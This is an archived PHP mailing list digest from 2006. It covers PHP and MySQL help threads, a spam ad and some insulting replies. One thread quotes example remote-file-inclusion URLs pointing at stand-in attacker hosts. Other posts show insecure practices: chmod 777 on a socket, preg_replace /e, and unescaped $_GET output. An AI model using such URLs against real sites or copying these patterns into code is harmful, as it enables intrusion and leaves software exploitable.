php-general Digest 14 Nov 2006 18:17:23 -0000 Issue 4459

[php-general-digest-help]

php-general Digest 14 Nov 2006 18:17:23 -0000 Issue 4459

Topics (messages 244584 through 244605):

Re: one click - two actions?
        244584 by: Paul Novitski
        244600 by: tedd

PHP firebird driver
        244585 by: Jacques Marneweck

Re: Parsing brackets in text
        244586 by: Shuping Zhou

Tour Guide around Jordan (Middle East) OFFER
        244587 by: Raven.Hawk
        244592 by: Google Kreme
        244595 by: Ryan A
        244596 by: Stut
        244598 by: Ryan A

Call to undefined function
        244588 by: Tom Chubb
        244589 by: Ivo F.A.C. Fokkema

Prevent XSS using DOM Extension and/or SimpleXML
        244590 by: Raphael Martins
        244594 by: Rob

Re: Mysql strategy
        244591 by: Raphael Martins

Re: Scrolling text
        244593 by: Google Kreme

PDO::PARAM_LOB and MySQL
        244597 by: Chris
        244599 by: Roman Neuhauser

Re: Highjack?
        244601 by: tedd
        244602 by: tedd

php cli and mysql
        244603 by: James Tu
        244605 by: cajbecu

date() function
        244604 by: Ashley M. Kirchner

Administrivia:

To subscribe to the digest, e-mail:
        [EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
        [EMAIL PROTECTED]

To post to the list, e-mail:
        php-general@lists.php.net


----------------------------------------------------------------------

--- Begin Message ---

At 11/13/2006 01:28 AM, Mel wrote:

Could someone please help me figure out how to show some description
(where applicable) at the same time as I show an image, when I click
on a link, without repeating the entire query?
The image and the description are both in the same table in my database.

I now show the image when I click on the link which is good, but the
description stays on at all times instead of appearing only when active.

http://www.squareinch.net/single_page.php

Mel,

I think what you're looking for is JOIN syntax for your queries:
http://dev.mysql.com/doc/refman/4.1/en/join.html

For example:

        SELECT * FROM client, job
        WHERE client.companyId=job.companyId
        AND (client.status='active' or client.status='old')
        order by client.companyName;

(Note that when you extract fields from more than one table like this, you identify the table that each field belongs to, e.g. client.companyId.)

Then you can extract the desired fields from both tables in the same loop because they've been captured together. Your current logic executes a job query for every row of client, which is extremely inefficient.

The dataset produced by the join query is going to look something like this:

client.         job.
companyId       companyId
    1           2
    1           3
    1           9
    2           4
    2           5
...

In other words, there will be one row for each job record, with the (parent) client fields duplicated each row.

You can further improve the efficiency of your query by naming only the fields you need, instead of using * to extract all fields:

        SELECT client.companyName, job.pix, job.jobType, job.url, job.web
        FROM client, job
        WHERE client.companyId=job.companyId
        AND (client.status='active' or client.status='old')
        order by client.companyName;

Once you execute the join query, your PHP loop can cycle in a similar way, echoing a company name and then listing all the job types until a new company name occurs, etc.

You've got other problems, however. If you look at your HTML source, you'll see markup like this:

<span class='navCompany'>Builtworks</span><span class='navArrow'>  > </span>

<span class='navText'><a href='single_page.php?art=btw_logo.jpg'>logo</a></span>

<span class='navText'><a href='single_page.php?art='></a></span>
<span class='navText'><a href='single_page.php?art='></a></span>
<span class='navText'><a href='single_page.php?art='></a></span>
<span class='navText'><a href='single_page.php?art='></a></span>

<br><span class='navCompany'>Citizens Bank / eProperty</span><span class='navArrow'> > </span> <span class='navText'><a href='single_page.php?art=ctz_web1.jpg'>website</a></span>

All those empty hyperlinks aren't doing anything but making your download heavier than it has to be. I think you need to test your 'jobType' fields and output only those that aren't blank.

Finally, to answer one of your questions, your logic to display the description area has a snarl of syntax flaws:

/* query 2 from job */

...

        foreach($row as $url)
                {
                $row = mysql_fetch_array($result2,MYSQL_ASSOC);
                if ("url={$row['url']}")

echo "<span class='navText'><a href='{$row['url']}'>{$row['web']}</ a></span>";

                }

You're testing if ("url={$row['url']}")

1) Because you've put that expression in quotes, you're testing the true/false value of a string expression which will always test true unless it's blank, which this one will never be.

Expressing it as a string might be correct if you were using eval(), but you're not and you're safer not to. Eval() can get you into big trouble if there are PHP code fragments in your database fields; until you get better control of your logic I urge you not to use it.

2) You omitted the $ in front of $url.

3) You used a single equal sign instead of two.  This:
        if ($url = $row['url'])
tests whether $row['url'] is blank, and also sets $url equal to that value.

I think you meant this:
        if ($url == $row['url'])

which tests whether the variable $url is equal to the database field $row['url'].

Good luck,
Paul

This is the code I have for the image area:
/* query 1 from client */
  $query = "SELECT * FROM client
                                where status='active' or status='old'
                                order by companyName";

  $result = mysql_query($query)
                                or die ("Couldn't execute query");

  while         ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
  {
  echo "<span class='navCompany'>{$aaa['companyName']}</span><span
class='navArrow'>  > </span>\n";

        /* query 2 from job */
        $query = "SELECT * FROM job
                                WHERE companyId='{$aaa['companyId']}'";
        $result2 = mysql_query($query)
                or die ("Couldn't execute query2");

                        foreach($aaa as $jobType)
                        {
                        $bbb = mysql_fetch_array($result2,MYSQL_ASSOC);

echo "<span class='navText'><a href='single_page.php?art=".$bbb ['pix']."'>{$bbb['jobType']}</a></span>\n";

                        }
        echo "<br>";
        }
        ?>

</div>


<div class="navbox3"><?php $image = $_GET['art']; ?>

<img src="images/<?php print ($image) ?>" alt="Portfolio Item"

border="0" width="285" height="285"></div>


This is the code I have for the description area:

/* query 1 from client */
$query = "SELECT * FROM client
                        where status='active' or status='old'
                        order by companyName";

        $result = mysql_query($query)
        or die ("Couldn't execute query");

while   ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{

/* query 2 from job */
$query = "SELECT * FROM job
                                WHERE companyId='{$row['companyId']}'";
                $result2 = mysql_query($query)
                or die ("Couldn't execute query2");
                $url = mysql_query($result2);

        foreach($row as $url)
                {
                $row = mysql_fetch_array($result2,MYSQL_ASSOC);
                if ("url={$row['url']}")

echo "<span class='navText'><a href='{$row['url']}'>{$row['web']}</ a></span>";

                }

        echo "<br>";
        }
        ?>

--- End Message ---

--- Begin Message ---

At 12:31 PM -0800 11/13/06, Mel wrote:

I really don't know?

My site is all php and ready to go live except for this little problem.

I would really appreciate some help.

On Nov 13, 2006, at 4:12 AM, John Meyer wrote:

Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?

Mel:

I think I know what you want, which is when someone clicks "Bullworks > Logo" (for example) that not only does the Logo appear on the left, but you want text describing the logo to appear on the right, correct?

This can be done via an ajax and php combination. You may want to consider that. Plus, there would be no activity in the url portion of the user browser -- IMO, it looks cooler.

tedd
--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--- End Message ---

--- Begin Message ---

Hi,

Does anyone know how the firebird (ibase_pconnect) driver handles link failure. From what I can see it automatically reconnects to a firebird database server once the link comes back up without passing back a error that the database which it connects to has gone away like the mysql_pconnect does.

Regards
--jm

--
Jacques Marneweck
http://www.powertrip.co.za/
http://www.powertrip.co.za/blog/

#include <std/disclaimer.h>

--- End Message ---

--- Begin Message ---

Actually, preg_replace() can solve Dotan Cohen's problem. There was just a
minor mistake in the code.

Please try this:

<?php

function makeLink($title) {
   $returnString="<b>$title</b>";
   return $returnString;
}

$articleText="This is a very [long] and [stupid] string.";
$articleText=preg_replace('/(\[[a-z]+\])/e', "makeLink('$1')",
$articleText);
print $articleText;

?>

--- End Message ---

--- Begin Message ---

Please note >>> if you dont need it now !!!! you may will need it later so 
please save it for the future :) :)
Message: Destination: Amman
Season: January - December
Languages: English, Arabic
Minimum Cost: 50 US Dollar (USD) Per day
Maximum Cost: 100 US Dollar (USD) Per day
I have a 6 years experience in tourism and travel experince
In love with tourism I will show the world how beauty my country is. I
have been in this field with people from around the world and I guess
they are all satisfied and happy for the service I offer. Some of my
interests are: Trekking, Mountain-Biking, Geocaching; and places to
see are: historic sites in Saarland, Rheinland-Pfalz and Northern
France. The cities that I specialize in are the following:
- SW Germany
- Northern France
- Luxembourg
- Belgium
- Saarbruecken
- Strasbourg
- Trier
- Metz
Have you ever heared about the roses city? I can show it to you. Would
you like to figure out more about Roman theater? I can tell you.
For More details please contact me at
[EMAIL PROTECTED]
PLEASE NOTE >>>> You can make money if you refer me a clients by
having your own commission directly from the total price of the trip
COST
Contact me for more details
Thankss


       ----------------------------------------------
       This email is send by "Demo Software"

--- End Message ---

--- Begin Message ---

On 14 Nov 2006, at 02:17 , Raven.Hawk wrote:

Please note >>> if you dont need it now !!!! you may will need it later so please save it for the future :)

[CHOMP]

       ----------------------------------------------
       This email is send by "Demo Software"

/me wonders if "Demo Software" is at least written in php...

--

"Send beer, words simply can't adequately express your gratitude" - James Sedgwick
--- End Message ---

--- Begin Message ---

Google Kreme <[EMAIL PROTECTED]> wrote: On 14 Nov 2006, at 02:17 , Raven.Hawk 
wrote:
> Please note >>> if you dont need it now !!!! you may will need it  
> later so please save it for the future :)
[CHOMP]

>        ----------------------------------------------
>        This email is send by "Demo Software"

/me wonders if "Demo Software" is at least written in php...

Dont know if its written in php or not but it does prove a point....

software is getting more and more user friendly and our pal "Raven Hawk" has 
shown us even if both your parents are/were related and you were made fun of in 
school for being slow...and married a moron (and probably have little morons 
for kids), and live like a moron and spam like a moron you still have enough 
brains to figure out how to use present day software....




------
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
 
---------------------------------
Want to start your own business? Learn how on Yahoo! Small Business.

--- End Message ---

--- Begin Message ---

Ryan A wrote:

Dont know if its written in php or not but it does prove a point....

software is getting more and more user friendly and our pal "Raven Hawk" has 
shown us even if both your parents are/were related and you were made fun of in school 
for being slow...and married a moron (and probably have little morons for kids), and live 
like a moron and spam like a moron you still have enough brains to figure out how to use 
present day software....

I seem to deal with a lot of customers who could provide a lot of evidence for the opposition to that assertion!

-Stut

--- End Message ---

--- Begin Message ---

Stut <[EMAIL PROTECTED]> wrote: Ryan A wrote:
> Dont know if its written in php or not but it does prove a point....
>
> software is getting more and more user friendly and our pal "Raven Hawk" has 
> shown us even if both your parents are/were related and you were made fun of 
> in school for being slow...and married a moron (and probably have little 
> morons for kids), and live like a moron and spam like a moron you still have 
> enough brains to figure out how to use present day software....
>   

I seem to deal with a lot of customers who could provide a lot of 
evidence for the opposition to that assertion!

Oh well, I guess "Raven Hawk" is one of the more gifted morons and I give 
him.., and his kind more credit than deserved.


:)

------
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
 
---------------------------------
Want to start your own business? Learn how on Yahoo! Small Business.

--- End Message ---

--- Begin Message ---

I have just encountered a fatal error using file_put_contents() on a PHP4 box.
After a bit of research I found a simple function within the php.net
user comments.
I just wanted to know what happens if I then tried to run this script
on a PHP 5 box, whereby I'd be defining a function that already
exists.
Should I be changing the name of the function just in case it moves to
PHP5 in the future?
Thanks,

Tom

--- End Message ---

--- Begin Message ---

On Tue, 14 Nov 2006 09:36:52 +0000, Tom Chubb wrote:

> I have just encountered a fatal error using file_put_contents() on a PHP4 box.
> After a bit of research I found a simple function within the php.net
> user comments.
> I just wanted to know what happens if I then tried to run this script
> on a PHP 5 box, whereby I'd be defining a function that already
> exists.
> Should I be changing the name of the function just in case it moves to
> PHP5 in the future?
> Thanks,

Hi Tom,

if (!function_exists('file_put_contents')) {
    function file_put_contents (...)
    {
        // Do it your way!
    }
}

Ivo

--- End Message ---

--- Begin Message ---

Hi there!

I´m building a form validator using PHP and JS. It´s working fine by now, but I want to make a little improvement. Here is how its working now:

 1. The user fill the form. Every time he leaves the field, the JS
    code match the value against a regexp to validate.
 2. When the user submits the form, the PHP script match all the
    values against the same regexp's.

Now, i want to validate my fields to prevent XSS, allowing my html tags but only the attributes that I want.

I thought something like: (the tags and the valid attributes).
<?php
$form_html_validation = array(
      "p"=>array(""),
      "a"=>array("href","name","rel"),
      "ol"=>array(""),
      "ul"=>array(""),
      "li"=>array(""),
      "h2"=>array(""),
      "h3"=>array(""),
      "h4"=>array(""),
      "h5"=>array(""),
      "h6"=>array(""),
      "strong"=>array(""),
      "em"=>array("")  );
$valid_elements = "<".join("><",array_keys($form_html_validation)).">";
$userInput = strip_tags($userInput,$valid_elements);
//perform DOM Attribute Validation
?>

But I don´t know how to loop over every attribute for each tag in the DomTree.

Someone has any ideas?

Thank You

--- End Message ---

--- Begin Message ---

Raphael Martins wrote:

But I don´t know how to loop over every attribute for each tag in the DomTree.

Not sure if you need to do this element by element or just want all attributes, but here are two ways using DOM. They assume $dom is an already loaded DOMDocument.

1 - Use XPath:

$xPath = new DOMXPath($dom);
$nodelist = $xPath->query("//@*");
foreach ($nodelist AS $attr) {
        print $attr->nodeName." ".$attr->nodeValue."\n";
}


2 - Walk the tree manually:

function checkElement($node) {
        $attlist = $node->attributes;
        foreach ($attlist AS $attr) {
                print $attr->nodeName." ".$attr->nodeValue."\n";
        }
        if ($node->hasChildNodes()) {
                foreach ($node->childNodes AS $child) {
                        if ($child->nodeType == XML_ELEMENT_NODE) {
                                checkElement($child);
                        }
                }
        }
}

$root = $dom->documentElement;
checkElement($root);

Rob

--- End Message ---

--- Begin Message ---

Larry Garfield escreveu:

On Monday 13 November 2006 17:51, Chris wrote:

It's not going to make a great deal of difference if you do the
processing in the MySQL or the PHP, in this case it's basically the same
operation in each.  I suspect that efficiently recreating the LIKE
functionality in PHP wouldn't be trivial to do, if you are just doing
straight comparisons the MySQL STRCMP function should be faster.

I'd say there will be a big difference. Pulling in 10,000 entries from
the database and then sorting them in php will take a lot of memory (and
database time to retrieve all of the entries). Getting the database to
restrict that number of entries will take a little time but it doesn't
have to return all entries, your php memory won't blow out and it won't
have bugs in it.

As a general rule, I try to push as much logic into the query as I can for the simple reason that MySQL is optimized C and my PHP code gets interpreted. The odds of me writing something in PHP that's faster than MySQL AB's C code are slim. :-) The exception is grouping, which I've often had to do in PHP with a loop to rebuild a result array. The performance hit for that is not that big, however, and if you free() the result set afterward then the memory usage is not a major issue either.

If you're finding your query is slow, look into your indexes. Just today I cut a single query from 230 seconds to 21 seconds just by adding two indexes. :-)

I´m buiding a system that perform searches based on comma-separated "tags". I´m using the MySQL FIND_IN_SET function.

:D

--- End Message ---

--- Begin Message ---

On 13 Nov 2006, at 12:22 , Alain Roger wrote:

I would like to have a scrolling text (as banner) on our website.

er. eww.  But OK.

so, i would like to know if there is another way how to do a scrolling text without using flash, shockwave or other tool...only in php or HTML (in worse

case).

No. If you need to update a page that is already displayed, you need javascript.

However, the marquee tag should be able to be used without displaying on multiple lines...

That said, it's an ugly ugly tag and support for it is sparse. Avoid it. If you really want scrolling text you'd be better off finding some decent javascript code.

There, those are words I never thought I'd say.

--

"Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life."
--- End Message ---

--- Begin Message ---

Hi all.

I'm trying to read binary data from a MySQL 5 database using PDO's PARAM_LOB stream, but it's not working. It always returns the data as a string (not a stream).

I've found discussions where other people had this problem, but they all seem to have been solved by settng the PDO::ATTR_EMULATE_PREPARES attribute, which didn't work for me.

Here's the script I'm using
http://scratch.leftbrained.org/param_lob.phps

the get_db() function instantiates a named instance of the PDO object, and returns it (or just returns it if it's already been created, which, in this script, never happens). That instance, when created, is passed the

PDO::MYSQL_ATTR_USE_BUFFERED_QUERY flag.

I've tried disabling that to see if it affected my problem, and it didn't.

I based this code off the example in the documentation:

http://us2.php.net/manual/en/ref.pdo.php#AEN149844  (Example 12. Displaying an 
image from a database)

Any suggestions? It seems to be that it *should* be doing what I want, but it 
isn't.

Thanks,

Chris

--- End Message ---

--- Begin Message ---

# [EMAIL PROTECTED] / 2006-11-14 07:57:33 -0800:
> I based this code off the example in the documentation:
> 
> http://us2.php.net/manual/en/ref.pdo.php#AEN149844  (Example 12. Displaying 
> an image from a database)
> 
> Any suggestions? It seems to be that it *should* be doing what I want, but 
> it isn't.

    File a bug report.

-- 
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man.  You don't KNOW.
Cause you weren't THERE.             http://bash.org/?255991

--- End Message ---

--- Begin Message ---

At 7:12 PM +0100 11/13/06, Rory Browne wrote:

If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=


The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php

I still don't see how "badscript.php" can be uploaded into example.com's site in the first place -- unless "badscript.php" is not part of the evil-doers code but rather just a poor script.

I have noticed that the host has disabled "shell_exec()" since the attack -- so, I wonder if this was the cause or just a shotgun approach to server protection. However, he still has register_globals ON and safe_mode OFF.

tedd

--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--- End Message ---

--- Begin Message ---

At 12:38 PM -0500 11/13/06, Eric Butera wrote:

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

I don't have a shopping cart script on the site.

However, register_globals are ON, but I turn them off in my scripts.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

I  just looked at my logs and they only go back one day -- interesting.

tedd
--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--- End Message ---

--- Begin Message --- I'm running a php script from the command line (I'm on OS X) and I'm getting ...

Warning: mysql_connect(): Can't connect to local MySQL server through socket '/var/mysql/mysql.sock' (2)

Here's the script (this just tests a connection and a query...the actual script imports data from text files):

#!/usr/bin/php
<?php

echo "HELLO WORLD\n";
$connection = mysql_connect(HOST, ID, PW);
mysql_select_db(DB, $connection);

$result = mysql_query("SELECT COUNT(*) as num_of_countries from geo_entities");

$row = mysql_fetch_array($result);
print_r($row);

?>


I tested the script from a browser and the connection and query worked.

Do I have to do something special in order for PHP CLI to connect to MySQL?

-James

--- End Message ---

--- Begin Message ---

touch /var/mysql/mysql.sock
chmod 777 /var/mysql/mysql.sock

On 11/14/06, James Tu <[EMAIL PROTECTED]> wrote:

I'm running a php script from the command line (I'm on OS X) and I'm
getting ...

Warning: mysql_connect(): Can't connect to local MySQL server through
socket '/var/mysql/mysql.sock' (2)

Here's the script (this just tests a connection and a query...the
actual script imports data from text files):


#!/usr/bin/php
<?php

echo "HELLO WORLD\n";
$connection = mysql_connect(HOST, ID, PW);
mysql_select_db(DB, $connection);
$result = mysql_query("SELECT COUNT(*) as num_of_countries from
geo_entities");
$row = mysql_fetch_array($result);
print_r($row);

?>


I tested the script from a browser and the connection and query worked.
Do I have to do something special in order for PHP CLI to connect to
MySQL?

-James

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

--- End Message ---

--- Begin Message ---

   I noticed that if I do something like this:

   $prevminute = date("i")-1;

..and the current minute happens to be '05', $prevminute becomes '4' - I lose the padding. How can I ensure that I retain that padding? I suppose a crud solution is to run $prevminute through an if loop to see if it's < 10. But I'm wondering if there's a better way.

--
W | It's not a bug - it's an undocumented feature.
 +--------------------------------------------------------------------
 Ashley M. Kirchner <mailto:[EMAIL PROTECTED]>   .   303.442.6410 x130
 IT Director / SysAdmin / Websmith             .     800.441.3873 x130
 Photo Craft Imaging                       .     3550 Arapahoe Ave. #6
 http://www.pcraft.com ..... .  .    .       Boulder, CO 80303, U.S.A.

--- End Message ---